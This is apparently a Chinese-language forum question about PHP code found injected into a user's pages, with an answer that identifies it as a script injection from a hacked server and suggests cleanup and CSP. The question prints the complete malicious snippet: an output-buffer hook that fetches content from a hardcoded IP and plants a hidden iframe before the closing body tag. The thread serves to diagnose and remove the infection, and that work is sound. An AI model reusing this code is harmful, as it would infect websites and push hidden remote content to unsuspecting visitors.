我在某些.我的PHP页面。
<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>
有人知道吗?
或者至少告诉我它在做什么...
> 更新 09/11/2015
这称为JavaScript注入(XSS1),当您的服务器被黑客入侵并传播感染时,就会发生这种情况。
例如,这可能会在进入网站时启动下载窗口,导致被误导的用户在其计算机上下载可能的恶意软件。
要摆脱它,您最好检查您拥有的所有文件,扫描整个PC/也许进行全新安装。文件中通常有一些奇怪的<script>标签,其中包含一些非常奇怪的"毫无意义"的 JS - 这是一个很好的迹象,表明您的文件已注入 JS。
如果您想永久摆脱泄漏(或直到他们找到XSS您网站的新方法),您还需要找到泄漏
您可以采取以下措施来保护自己免受XSS的侵害:CSP
1 :: 跨站点脚本
题外话:
由于我今天重温这个答案,在2001年9/11事件发生14年后,我想向那些在那一天死去的人表示敬意 - R.I.P。